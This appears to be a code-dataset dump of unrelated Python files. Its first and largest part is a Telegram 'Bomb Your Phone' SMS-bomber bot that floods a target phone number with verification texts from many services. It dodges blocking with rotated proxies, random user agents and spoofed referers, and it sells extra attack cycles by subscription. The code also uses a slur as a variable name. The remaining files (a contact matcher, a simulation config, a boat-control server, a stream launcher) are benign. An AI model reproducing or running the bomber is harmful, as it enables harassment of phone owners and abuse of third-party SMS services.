f'ID: {meta[\"from_user\"]}\\n'\r\n f'Number: {meta[\"formatted\"]}\\n'\r\n f'Cycles: {meta[\"cycles\"]}\\n'\r\n f'Attack UID: {meta[\"attack_id\"]}\\n'\r\n f'Operator: {meta[\"operator\"]}\\n'\r\n f'Country: {meta[\"country\"]}\\n'\r\n f'Region: {meta[\"region\"]}')\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Забанить\",\r\n callback_data=f\"ban_user {meta['from_user']}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {meta['from_user']}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Остановить',\r\n callback_data=f\"stop_attack {meta['from_user']}\"\r\n )\r\n button4 = types.InlineKeyboardButton(\r\n 'Ссылка',\r\n url=f'tg://resolve?domain={database.get_user(meta[\"from_user\"])[\"user_name\"]}'\r\n )\r\n button5 = types.InlineKeyboardButton(\r\n 'Логи',\r\n callback_data=f\"send_logs {meta['attack_id']}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n\r\n if database.get_user(meta[\"from_user\"])[\"user_name\"] is not None:\r\n kb.row(button3, button4)\r\n kb.row(button5)\r\n\r\n else:\r\n kb.row(button3, button5)\r\n text += f'\\n\\nMention of a user'\r\n\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n\r\n\r\ndef get_user_agent():\r\n software_names = [SoftwareName.CHROME.value, SoftwareName.LYNX.value,\r\n SoftwareName.BLUE_CHROME.value, SoftwareName.EDGE.value,\r\n SoftwareName.INTERNET_EXPLORER.value, SoftwareName.FIREFOX.value,\r\n SoftwareName.SAFARI.value, SoftwareName.YANDEX.value,\r\n SoftwareName.CHROMIUM.value]\r\n operating_systems = [OperatingSystem.WINDOWS.value, OperatingSystem.LINUX.value,\r\n OperatingSystem.ANDROID.value, OperatingSystem.CHROMEOS.value,\r\n OperatingSystem.MAC_OS_X.value, OperatingSystem.MACOS.value,\r\n OperatingSystem.DARWIN.value, OperatingSystem.IOS.value,\r\n OperatingSystem.WINDOWS_PHONE.value]\r\n\r\n user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=100)\r\n\r\n user_agent = user_agent_rotator.get_random_user_agent()\r\n\r\n return user_agent\r\n\r\n\r\ndef get_client(proxy_status: bool):\r\n proxy_string = random.choice(database.get_proxys()) if proxy_status else str()\r\n\r\n agent = get_user_agent()\r\n referer = random.choice(['https://yandex.ru/', 'https://www.google.com/',\r\n 'https://www.bing.com/', 'https://ya.ru/', 'https://mail.ru/',\r\n 'https://www.rambler.ru/', 'https://www.startpage.com/',\r\n 'https://www.qwant.com/?l=en', 'https://duckduckgo.com/',\r\n 'https://www.ecosia.org/', 'https://swisscows.com/',\r\n 'https://www.yahoo.com/', 'https://www.youtube.com/'])\r\n\r\n headers = {\r\n \"User-Agent\": agent,\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"Referer\": referer,\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\"\r\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Connection\": \"keep-alive\",\r\n \"Accept-Language\": \"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\"\r\n }\r\n\r\n return aiohttp.ClientSession(\r\n headers=headers,\r\n connector=ProxyConnector.from_url(f'http://{proxy_string}')\r\n ) if proxy_status else aiohttp.ClientSession(\r\n headers=headers,\r\n connector=aiohttp.TCPConnector(limit=300, ssl=False)\r\n )\r\n\r\n\r\ndef generate_attack_message(formatted: str, status: str,\r\n connection: str, uid: str,\r\n cycles: int, country: str,\r\n region: str, operator: str,\r\n send_msg: int, cycles_completed: int,\r\n progressbar: str, attack_start_time: str,\r\n attack_stop_time: str):\r\n return f'Атака на номер {formatted}\\n\\n' \\\r\n f'Статус: {status}\\n' \\\r\n f'Подключение: {connection}\\n' \\\r\n f'UID: {uid}\\n' \\\r\n f'Количество циклов: {cycles}\\n\\n' \\\r\n f'Страна: {country}\\n' \\\r\n f'Регион: {region}\\n' \\\r\n f'Оператор: {operator}\\n\\n' \\\r\n f'Время начала атаки: {attack_start_time}\\n' \\\r\n f'Время окончания атаки: {attack_stop_time}\\n\\n' \\\r\n f'Количество отправленных СМС: {send_msg}\\n' \\\r\n f'Количество пройденных циклов: {cycles_completed}\\n\\n' \\\r\n f'{progressbar}'\r\n\r\n\r\ndef user_logger(attack_id: str, category: str, message: str, newattack: bool = False):\r\n if not newattack:\r\n for message in message.splitlines():\r\n with open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'a', encoding='utf8') as f:\r\n f.write(f'[{tools.get_formatted_time()}] [{category}] {message}\\n')\r\n else:\r\n with open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'w', encoding='utf8') as f:\r\n f.write(f'\\n ██████╗ ██████╗ ███╗ ███╗██████╗ ██╗ ██╗ ██████╗ ██╗ ██╗██████╗ \\n'\r\n f' ██╔══██╗██╔═══██╗████╗ ████║██╔══██╗ ╚██╗ ██╔╝██╔═══██╗██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝██║ ██║██╔████╔██║██████╔╝ ╚████╔╝ ██║ ██║██║ ██║██████╔╝\\n'\r\n f' ██╔══██╗██║ ██║██║╚██╔╝██║██╔══██╗ ╚██╔╝ ██║ ██║██║ ██║██╔══██╗\\n'\r\n f' ██████╔╝╚██████╔╝██║ ╚═╝ ██║██████╔╝ ██║ ╚██████╔╝╚██████╔╝██║ ██║\\n'\r\n f' ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝\\n'\r\n f' ██████╗ ██╗ ██╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ████████╗\\n'\r\n f' ██╔══██╗██║ ██║██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔═══██╗╚══██╔══╝\\n'\r\n f' ██████╔╝███████║██║ ██║██╔██╗ ██║█████╗ ██████╔╝██║ ██║ ██║ \\n'\r\n f' ██╔═══╝ ██╔══██║██║ ██║██║╚██╗██║██╔══╝ ██╔══██╗██║ ██║ ██║ \\n'\r\n f' ██║ ██║ ██║╚██████╔╝██║ ╚████║███████╗ ██████╔╝╚██████╔╝ ██║ \\n'\r\n f' ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ \\n\\n')\r\n\r\n\r\ndef get_attack_stop_time(meta: dict, timeout: int, pause: int, cycles: int):\r\n quantity_services = len(tools.load_services().items())\r\n _time = int((((timeout / 3) + pause) * quantity_services * cycles) / 180)\r\n stop_time_timestamp = int(meta['started']) + (_time * 51)\r\n formatted = datetime.datetime.fromtimestamp(stop_time_timestamp, pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n return '* ' + formatted\r\n\r\n\r\nasync def attack(message: types.Message, meta: dict, from_user: int):\r\n global active_grabber\r\n global active_gays\r\n\r\n await log(meta)\r\n\r\n attack_id = meta['attack_id']\r\n code = meta['code']\r\n number = meta['number']\r\n formatted = meta['formatted']\r\n formatted_title = meta['formatted_title']\r\n cycles = meta['cycles']\r\n operator = meta['operator']\r\n country = meta['country']\r\n region = meta['region']\r\n attack_start_time = datetime.datetime.fromtimestamp(meta['started'], pytz.timezone(\r\n 'Europe/Moscow'\r\n )).strftime(\"%H:%M:%S MSK\")\r\n\r\n user_logger(attack_id, str(), str(), True)\r\n\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n\r\n referer = 'Proxoid.net'\r\n\r\n user_dump = database.get_user(from_user)\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 'Прямое'\r\n pause = user_dump['settings']['pause']\r\n timeout = user_dump['settings']['timeout']\r\n\r\n client = get_client(proxy_status)\r\n\r\n services_completed = 0\r\n sms_send = 0\r\n failed_sms = 0\r\n all_sms = len(tools.load_services().items()) * cycles\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Остановить атаку ⛔',\r\n callback_data=f\"stop_attack {from_user}\"\r\n )\r\n kb.row(button)\r\n\r\n active_gays.append(from_user)\r\n\r\n if len(database.get_proxys()) < config.min_proxys and not active_grabber:\r\n active_grabber = True\r\n threading.Thread(target=proxy_grabber.grab, args=(logger, database,\r\n config.proxoid_token)\r\n ).start()\r\n\r\n # formatted = meta['formatted']\r\n # cycles = meta['cycles']\r\n # operator = meta['operator']\r\n # country = meta['country']\r\n # region = meta['region']\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Initialization...\\n'\r\n f'ATTACK_ID: {attack_id}\\n'\r\n f'PHONE: {formatted}\\n'\r\n f'CYCLES: {cycles}\\n'\r\n f'TIMEOUT: {timeout}s\\n'\r\n f'PAUSE: {pause}s\\n'\r\n f'PHONE_COUNTRY: {country}\\n'\r\n f'PHONE_REGION: {region}\\n'\r\n f'PHONE_OPERATOR: {operator}')\r\n\r\n for cycle in range(1, cycles + 1):\r\n if from_user not in active_gays:\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack stopped by user.')\r\n break\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', f'Cycle {cycle} started!')\r\n for module, service in tools.load_services().items():\r\n services_completed += 1\r\n\r\n if from_user not in active_gays:\r\n break\r\n\r\n if (datetime.datetime.timestamp(datetime.datetime.now()) - latest_edited) >= 15:\r\n try:\r\n latest_edited = datetime.datetime.timestamp(datetime.datetime.now())\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Message updated.')\r\n await message.edit_text(generate_attack_message(formatted_title, 'В работе!',\r\n proxy_status_formatted, attack_id, cycles,\r\n country, region, operator, sms_send, cycle - 1,\r\n progressbar, attack_start_time,\r\n get_attack_stop_time(meta, timeout, pause,\r\n cycles - cycle - 1)),\r\n parse_mode='html', reply_markup=kb, disable_web_page_preview=True)\r\n except exceptions.MessageNotModified:\r\n pass\r\n try:\r\n await asyncio.sleep(pause)\r\n await getattr(module, service)(str(number), str(code), timeout, client).run()\r\n sms_send += 1\r\n user_logger(attack_id, service, f'Sent! ({sms_send}/{failed_sms})')\r\n except (ValueError, AttributeError, Exception):\r\n user_logger(attack_id, service, f'Not sent! Caused by {sys.exc_info()[0].__name__} '\r\n f'({sms_send}/{failed_sms})')\r\n failed_sms += 1\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n proxy_status = random.choice([True, False]) if user_dump['settings']['proxy_status'] else False\r\n proxy_status_formatted = f'Прокси от {referer}' if proxy_status else 'Прямое'\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Reconnecting...')\r\n client = get_client(proxy_status)\r\n continue\r\n\r\n try:\r\n await client.close()\r\n except (BaseException, Exception):\r\n pass\r\n\r\n progressbar = tools.generate_progressbar(sms_send + failed_sms, all_sms)\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button = types.InlineKeyboardButton(\r\n 'Отправить логи 💾',\r\n callback_data=f\"send_logs {attack_id}\"\r\n )\r\n kb.row(button)\r\n\r\n user_logger(attack_id, 'Bomb Your Phone Bot', 'Attack finished!')\r\n await message.edit_text(generate_attack_message(formatted_title, 'Завершено.', proxy_status_formatted,\r\n attack_id, cycles, country, region, operator,\r\n sms_send, cycles, progressbar, attack_start_time,\r\n tools.get_formatted_time()),\r\n parse_mode='html', reply_markup=kb,\r\n disable_web_page_preview=True)\r\n\r\n if from_user in active_gays:\r\n active_gays.remove(from_user)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('send_logs'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n attack_id = callback_query.data.split(' ', maxsplit=1)[1]\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n document = open(f'{__main__.PATH}/user_logs/{attack_id}.txt', 'rb')\r\n await callback_query.answer('Логи отправлены! Они придут в течении минуты.', True)\r\n return await bot.send_document(chat_id=callback_query.from_user.id,\r\n document=document)\r\n except (BaseException, Exception):\r\n await callback_query.answer('К сожалению, мы не нашли логи для этой атаки.', True)\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('unban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if not database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже лив инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW UNBAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'UnBanned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.unban_user(user)\r\n\r\n try:\r\n misc.gays.remove(user)\r\n except (BaseException, Exception):\r\n pass\r\n\r\n text = f'Вы были разблокированы администратором {dump[\"full_name\"]}.'\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} разбанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('ban_user'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n dump = database.get_user(callback_query.from_user.id)\r\n\r\n if database.get_user(user)['ban_status']:\r\n try:\r\n return await callback_query.answer(f'Уже дед инсайд!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n text = (\"NEW BAN!\\n\\n\"\r\n f'Admin: {dump[\"full_name\"]}\\n'\r\n f'Banned: user\\n'\r\n f'UserID: {user}')\r\n text += f'\\nUsername: @{database.get_user(user)[\"user_name\"]}' if database.get_user(user)[\"user_name\"] != \"\" else \"\"\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Разбанить\",\r\n callback_data=f\"unban_user {user}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {user}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Профиль админа',\r\n callback_data=f\"get_profile {callback_query.from_user.id}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n kb.row(button3)\r\n\r\n try:\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n except exceptions.ChatNotFound:\r\n pass\r\n\r\n database.ban_user(user)\r\n\r\n text = f'Вы были заблокированы администратором {dump[\"full_name\"]}. Для ' \\\r\n f'разблокировки, пожалуйста, ' \\\r\n f'обратитесь в тех. поддержку (@{config.support}). ' \\\r\n f'Ваш персональный код - {user}'\r\n\r\n misc.gays.append(user)\r\n\r\n try:\r\n await bot.send_message(user, text, parse_mode='html')\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer(f'Пользователь {user} забанен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('get_profile'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n text = start_message.generate_profile_text(user)\r\n\r\n await bot.send_message(callback_query.from_user.id, text, parse_mode='html')\r\n\r\n try:\r\n return await callback_query.answer(f'Профиль пользователя {user} отправлен!', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.callback_query_handler(lambda e: e.data.startswith('stop_attack'))\r\nasync def start_callback(callback_query: types.CallbackQuery):\r\n logger('Button', f'{tools.get_full_name(callback_query)} with id {callback_query.from_user.id} '\r\n f'press button {callback_query.data}')\r\n\r\n try:\r\n from_user = int(callback_query.data.split(' ', maxsplit=1)[1])\r\n except (BaseException, Exception):\r\n return\r\n\r\n try:\r\n active_gays.remove(from_user)\r\n except (Exception, BaseException):\r\n pass\r\n\r\n try:\r\n return await callback_query.answer('Атака остановлена! Сообщение обновится в течении минуты.', True)\r\n except exceptions.InvalidQueryID:\r\n return\r\n\r\n\r\n@dp.message_handler(content_types=['text'])\r\nasync def text_handler(message: types.Message):\r\n if not await thinker(message):\r\n return\r\n\r\n dump = get_user(message.from_user.id)\r\n checker = check_bomber(message, dump['settings']['default_cycles'])\r\n\r\n trial = not dump['sub_status']\r\n max_cycles = config.trial_cycles_count if trial else config.sub_cycles_count\r\n\r\n if not checker:\r\n text = 'Номер недействителен. ' \\\r\n 'Для получения информации об ' \\\r\n 'использовании бота, пожалуйста, ' \\\r\n 'используйте помощь.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n full_phone = tools.get_full_number(checker['code'], checker['number'])\r\n\r\n if trial and dump['trial_start_count'] < 1:\r\n text = 'К сожалению, ваш пробный период закончился. ' \\\r\n 'Для возобновления доступа к боту, пожалуйста, ' \\\r\n 'перейдите во вкладку \"Донат\" стартового сообщения.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['cycles'] > max_cycles:\r\n text = f'К сожалению, вы не можете использовать ' \\\r\n f'более {max_cycles} циклов. Для получения более ' \\\r\n f'подробной информации посетите вкладку \"Профиль\" ' \\\r\n f'стартового сообщения'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if full_phone in get_users()['attached_phone_numbers']:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как его владелец имеет ' \\\r\n f'подписку в нашем боте'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if checker['code'] not in config.available_phone_codes:\r\n text = f'К сожалению, вы не можете запустить спам на ' \\\r\n f'данный номер телефона, так как операторы ' \\\r\n f'данной страны не обслуживаются'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n if message.from_user.id in active_gays:\r\n text = f'К сожалению, вы не можете запустить спам ' \\\r\n f'на более одного номера одновременно. Пожалуйста, завершите ' \\\r\n f'предыдущую атаку.'\r\n\r\n reply_message = await message.reply(text, parse_mode='html')\r\n await asyncio.sleep(15)\r\n await reply_message.delete()\r\n return await message.delete()\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n kb.row(types.InlineKeyboardButton(\r\n \"Wait... 🔙\",\r\n callback_data=\"passed\"\r\n ))\r\n\r\n reply_message = await message.reply(generate_attack_message(checker['formatted'], 'Ожидание...', 'Неизвестно',\r\n checker['attack_id'], checker['cycles'],\r\n checker['country'],\r\n checker['region'], checker['operator'], 0, 0,\r\n tools.generate_progressbar(0, 100),\r\n tools.get_formatted_time(), 'Неизвестно'),\r\n parse_mode='html', reply_markup=kb)\r\n\r\n checker['started'] = tools.get_time()\r\n\r\n if trial:\r\n database.minus_attack(message.from_user.id)\r\n\r\n await attack(reply_message, checker, message.from_user.id)\r\n","sub_path":"handlers/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":27621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"10151107","text":"#!/usr/bin/env python3\n\nimport logging\nimport unicodedata\nfrom collections import Counter\n\nfrom pylev3 import Levenshtein\n\n\ndef find_best_match(input_str, tab):\n normalized_input_str = _normalize(input_str)\n normalized_tab = [_normalize(item) for item in tab]\n result = Levenshtein.wfi([item[0: len(normalized_input_str)] for item in normalized_tab], normalized_input_str)\n\n grouped_list = Counter(result)\n distance_between_contacts = max(grouped_list.keys()) - min(grouped_list.keys())\n minimums_count = grouped_list[min(grouped_list.keys())]\n\n if (distance_between_contacts < 4) or (minimums_count > 3):\n raise Exception(\"No Contact named %s found\" % input_str)\n\n else:\n index = result.index(min(result))\n logging.info(\"Contact found %s\" % tab[index])\n return tab[index]\n\n\ndef _normalize(input_str):\n nkfd_form = unicodedata.normalize('NFKD', input_str)\n return (\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])).lower()\n","sub_path":"contact_finder.py","file_name":"contact_finder.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"31435606","text":"import pema\nimport os\nimport straxen\nimport wfsim\n\nname = 'kr'\nbase_dir = '/dali/lgrandi/angevaare/wfsims/pema'\n\n# Fixed\ndata_name = f'pema_w{wfsim.__version__}_p{pema.__version__}'\nfig_dir = os.path.join(base_dir, f'figures_summary_{data_name}')\ndata_dir = os.path.join(base_dir, name, 'processed_data')\nraw_data_dir = os.path.join(base_dir, 'raw_data')\ninstructions_csv = f\"./inst_{data_name}.csv\"\n\n# You need this for setting up the dali-jobs\nenviron_init = '''eval \"$(/home/angevaare/software/Miniconda3/bin/conda shell.bash hook)\"\nconda activate strax\nexport PATH=/home/angevaare/software/Miniconda3/envs/strax/bin:$PATH'''\n\n# Output naming\ndefault_label = 'Normal clustering'\ncustom_label = 'Changed clustering'\n\n# Take a few arbitrary runs that allow to run jobs in parallel and get the \n# gains from CMT\nrun_list = list(f'{r:06}' for r in range(18750, 18750 + 15))\n\n# Just some id which allows CMT to load\nrun_id = run_list[0]\n\n# setting up instructions like this may take a while. You can set e.g. \ninstructions = dict(\n event_rate=5, # Don't make too large -> overlapping truth info\n chunk_size=5, # keep large -> less overhead but takes more RAM\n nchunk=100, # set to 100\n photons_low=1, # PE\n photons_high=100, # PE\n electrons_low=1, #\n electrons_high=100,\n tpc_radius=straxen.tpc_r,\n tpc_length=straxen.tpc_z, # TPC length approx\n drift_field=straxen.get_resource('fax_config_nt_low_field.json', fmt='json').get('drift_field'),\n timing='uniform', # Double S1 peaks uniform over time\n)\n\npema.inst_to_csv(\n instructions,\n instructions_csv,\n get_inst_from=pema.kr83_instructions)\n\nconfig_update = dict(\n detector='XENONnT',\n fax_file=os.path.abspath(instructions_csv),\n fax_config='fax_config_nt_low_field.json',\n)\n","sub_path":"notebooks/setup_kr.py","file_name":"setup_kr.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"46739778","text":"from fastapi import FastAPI\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\nimport json\n\nfrom fake_boat import FakeBoat\n\nboat = FakeBoat()\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\nclass Item(BaseModel):\n speed: int\n angle: int\n led1: bool\n led2: bool\n\n\n@app.get(\"/\")\nasync def root():\n page = \"\"\n with open(\"index.html\") as f:\n page = f.read()\n return HTMLResponse(content=page)\n\n\n@app.post(\"/control\")\nasync def root(item: Item):\n data = item\n boat.set_led(data.led1, 0)\n boat.set_led(data.led2, 1)\n boat.set_speed(data.speed)\n boat.set_angle(data.angle)\n return {\"message\": \"Set: \"+str(boat)}\n\n\n@app.get(\"/telemetry\")\nasync def root():\n response = {\"speed\": boat.get_speed(),\n \"angle\": boat.get_angle(),\n \"led1\": boat.get_led(0),\n \"led2\": boat.get_led(1)}\n print(\"sending telemetry: \", response)\n #return JSONResponse(content=jsonable_encoder(response))\n return HTMLResponse(content=json.dumps(response))\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"569887487","text":"#!python2\n\nimport argparse\nimport logging\nfrom subprocess import Popen\nimport json\nfrom livestreamer import streams as livestreamer_stream\nfrom stream_lib import Streams\nfrom configparser import SafeConfigParser, ParsingError\nfrom shutil import copy\nimport webbrowser\nfrom movewindows import WindowsPosition\nimport time\n\n\n# Reading and loading configs\ntry:\n conf = SafeConfigParser()\n conf.read('E:\\code\\stream-check\\config.ini')\n STREAM_LIST_PATH = conf.get('stream_dict', 'path')\n STREAM_BACKUP_PATH = conf.get('stream_dict', 'backup')\n TEXT_PATH = conf.get('massiveadd', 'path')\n LOG_PATH = conf.get('log', 'path')\n FORMATTER = '%(asctime)-15s | %(levelname)-8s \\n %(message)-8s'\n logging.basicConfig(\n filename=LOG_PATH, level=logging.INFO, format=FORMATTER)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n browser = webbrowser.get('windows-default')\nexcept ParsingError as e:\n print(\"Couldn't parse because {}\".format(e))\n\n\ndef open_dict():\n with open(STREAM_LIST_PATH) as f:\n logging.info('Opening dictionary')\n read_dict = json.load(f)\n stream_dict = Streams(read_dict)\n return stream_dict\n\n\ndef add_streams(url, game):\n stream_dict = open_dict()\n stream_dict.addStream(game.upper(), str(url))\n try:\n copy(STREAM_LIST_PATH, STREAM_BACKUP_PATH)\n logging.info('Backing up stream list at {}'.format(STREAM_BACKUP_PATH))\n except Exception as e:\n logging.error('Backup failed: {}'.format(e))\n with open(STREAM_LIST_PATH, 'w') as f:\n json.dump(stream_dict.streams, f)\n logging.info('Added url: {} \\n category: {}'.format(url, game))\n\n\ndef check_stream(url):\n try:\n if livestreamer_stream(url):\n return True\n else:\n return False\n except Exception as e:\n if args.verbose:\n logging.error('Couldnt open: {} ({})'.format(url, e))\n else:\n logging.error('Couldnt open: {}'.format(url))\n\n\ndef open_livestreamer(stream_urls, quality, verbose, chat, monitor):\n for stream_url in stream_urls:\n if check_stream(stream_url):\n if chat:\n webbrowser.open_new_tab(\n '{}/{}'.format(str(stream_url), 'chat'))\n\n #vod mode, makes possible to skip the time\n try:\n int(str(stream_url).split('/')[-1]) \n Popen(\n 'livestreamer {} {} -Q --player-passthrough=hls'.format(str(stream_url), quality), shell=verbose)\n #normal mode\n except ValueError: \n Popen(\n 'livestreamer {} {} -Q '.format(str(stream_url), quality), shell=verbose)\n\n logging.info('Opening: {} \\n Quality: {} \\n verbose: {}'.format(\n stream_url, quality, verbose))\n\n time.sleep(16)\n windows = WindowsPosition()\n windows.move(monitor)\n\n\ndef massive_add(text):\n with open(text, 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n for line in lines:\n if line == line.upper():\n game = line\n else:\n url = line.split()\n add_streams(''.join(url[1::3]), game)\n\n\ndef main(game=None, quality='source', verbose=True, chat=False, monitor='monitor1'):\n streams = open_dict()\n if game == None:\n for stream in streams:\n open_livestreamer(stream, quality, verbose, chat, monitor)\n else:\n for game_category in game:\n open_livestreamer(\n streams[game_category.upper()], quality, verbose, chat, monitor)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Game streams to open')\n parser.add_argument(\n '--single', '-s', help='opens a single stream', action=\"store\")\n parser.add_argument( \n '--multi', '-m', help=\"open multiple streams\", nargs='*', action=\"store\")\n parser.add_argument(\n '--add', '-a', help=\"add stream to the list URL GAME\", nargs=2, action=\"store\")\n parser.add_argument(\n '-v', '--verbose', help=\"Makes cmd windows appear\", action=\"store_true\")\n parser.add_argument(\n '-c', '--chat', help=\"Opens twitch chat if available\", action=\"store_true\")\n parser.add_argument(\n '--quality', '-q', help='Chooses the quality to open streams, default = source', default='source')\n parser.add_argument(\n '--monitor', '-mn', help='Chooses the monitor to open, default = monitor1, n (see movewindows.py)', default='monitor1', action=\"store\")\n args = parser.parse_args()\n verbose = False if args.verbose else True\n chat = True if args.chat else False\n if args.single:\n open_livestreamer(\n [args.single], args.quality, verbose, chat, args.monitor)\n elif args.multi:\n main(args.multi, args.quality, verbose, chat, args.monitor)\n elif args.add:\n add_streams(args.add[0], args.add[1])\n else:\n main()\n","sub_path":"streamcheck-old.py","file_name":"streamcheck-old.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"146283244","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom datasets import 